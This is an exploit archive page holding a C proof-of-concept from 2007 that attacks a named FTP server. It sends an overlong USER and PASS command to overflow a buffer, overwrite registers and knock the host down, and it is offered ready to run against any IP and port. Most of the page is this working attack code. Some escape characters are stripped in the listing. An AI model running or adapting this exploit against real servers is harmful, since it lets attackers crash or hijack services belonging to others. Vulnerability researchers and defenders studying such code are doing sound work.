Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC
# Published : 2007-01-14
# Author : Marsu
# Previous Title : WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit
# Next Title : BolinTech DreamFTP (USER) Remote Buffer Overflow PoC

/************************************************************************
*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow              *
*                                                                       *
*Sending a long USER / PASS request to server triggers the vulnerability*
*EAX and EDX are owned leading to code execution                        *
*This is only a POC                                                     *
*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery            *
*                                                                       *
*Usage: sami.exe ip port                                                *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	struct hostent *he;
	struct sockaddr_in sock_addr;
	WSADATA wsa;
	int ftpsock;
	char recvbuff[1024];
	char evilbuff[1024];
	int buflen=600;// 650 will kill the app. 600 just call the debugger

	if (argc!=3)
	{
		printf("[+] Usage: %s <ip> <port>n",argv[0]);
		return 1;
	}
	WSACleanup();
	WSAStartup(MAKEWORD(2,0),&wsa);

	printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
	if ((he=gethostbyname(argv[1])) == NULL) {
		printf("Failedn[-] Could not init gethostbynamen");
		return 1;
	}
	if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Failedn[-] Socket errorn");
		return 1;
	}

	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(atoi(argv[2]));
	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(sock_addr.sin_zero), '', 8);
	if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
		printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());
		return 1;
	}
	printf("OKn");
	memset(recvbuff,'',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Building payload ... ");
	memset(evilbuff,'A',buflen);
	memset(evilbuff+585,'B',4);	//eax and edx will be 42424262
	memcpy(evilbuff,"USER ",5);
	memcpy(evilbuff+buflen,"rn",3);
	printf("OKn[+] Sending USER ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failedn[-] Could not sendn");
		return 1;
	}
	printf("OKn");
	memset(recvbuff,'',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	memcpy(evilbuff,"PASS ",5);
	printf("[+] Sending PASS ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failedn[-] Could not sendn");
		return 1;
	}
	printf("OKn");
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Host should be downn");
	return 0;
}

// www.Syue.com [2007-01-14]